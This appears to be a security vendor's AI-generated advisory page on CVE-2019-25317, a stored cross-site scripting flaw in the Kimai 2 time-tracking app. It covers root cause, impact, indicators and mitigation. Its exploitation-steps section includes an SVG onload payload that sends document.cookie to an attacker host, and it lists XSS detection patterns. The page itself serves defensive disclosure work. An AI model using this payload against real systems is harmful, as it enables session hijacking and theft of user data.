CVE-2019-25317: 
PHP vulnerability analysis and mitigation

Overview

CVE-2019-25317 is a persistent (stored) cross-site scripting (XSS) vulnerability in Kimai 2, an open-source time-tracking application. It affects Kimai versions up to and including 1.1, allowing authenticated attackers with low privileges to inject malicious SVG-based XSS payloads into timesheet description fields. The vulnerability was originally fixed on July 14, 2019 via pull request #962 and formally published to the GitHub Advisory Database on February 11, 2026 (GHSA-9278-6hcj-2p4j). It carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).

Technical details

The root cause is improper neutralization of user-controlled input in the timesheet description field before it is rendered in the web page (CWE-79). Kimai 2 failed to sanitize or encode SVG-based payloads submitted to the description field, allowing stored JavaScript to execute in the browsers of other users who view the affected timesheet entries. The fix was applied in src/Twig/MarkdownExtension.php, indicating the vulnerability resided in the Twig template rendering layer where markdown content was output without adequate escaping. A public proof-of-concept exploit is available on Exploit-DB (EDB-47286) (GitHub Advisory, Kimai PR #962).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary JavaScript in the browsers of other Kimai users who view the poisoned timesheet entries. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims, and access to sensitive timesheet or project data. Availability is not impacted, but confidentiality and integrity of user sessions and data are at risk (GitHub Advisory).

Exploitability

A public proof-of-concept exploit is available on Exploit-DB (https://www.exploit-db.com/exploits/47286), demonstrating SVG-based XSS payload injection into timesheet descriptions. There is no evidence of active in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.009% (1st percentile), indicating a very low probability of exploitation in the near term. This CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).

Exploitation steps

  1. Authenticate: Log in to a vulnerable Kimai 2 instance (version ≤ 1.1) with any low-privileged user account that has permission to create or edit timesheet entries.
  2. Craft SVG XSS payload: Prepare a malicious SVG-based XSS payload, such as an inline SVG element containing an onload event handler (e.g., <svg onload="fetch('https://attacker.com/steal?c='+document.cookie)">) to exfiltrate session cookies.
  3. Inject payload: Insert the crafted SVG payload into the description field of a new or existing timesheet entry and save it. The application stores the unsanitized input in the database.
  4. Wait for victim interaction: When another user (e.g., an administrator or team member) views the timesheet listing or detail page containing the malicious entry, the browser renders the SVG and executes the embedded JavaScript.
  5. Harvest results: Collect exfiltrated session tokens or credentials from the attacker-controlled server, then use them to hijack the victim's session or perform unauthorized actions within Kimai (GitHub Advisory, Exploit-DB).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from users' browsers to external domains immediately after viewing timesheet pages; requests containing URL-encoded cookie or session data in query parameters.
  • Logs: Web server access logs showing timesheet description fields containing SVG tags or JavaScript event handlers (e.g., <svg, onload=, onerror=) in POST request bodies.
  • Application Data: Timesheet description entries in the database containing raw SVG markup, JavaScript URIs (javascript:), or HTML event attributes (onload, onerror, onclick).
  • Browser: Unexpected JavaScript errors or network requests triggered when loading the timesheet view, visible in browser developer tools.

Mitigation and workarounds

Upgrade Kimai to version 1.1 or later, which includes the fix applied in commit a0e8aa3 that adds proper output encoding in src/Twig/MarkdownExtension.php (Kimai PR #962). As a complementary measure, implement a Content Security Policy (CSP) header that restricts inline script execution and disallows loading resources from untrusted origins. Administrators should also audit existing timesheet descriptions for SVG or JavaScript payloads and sanitize any suspicious content. Restricting timesheet description editing to trusted users can reduce the attack surface until patching is complete (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management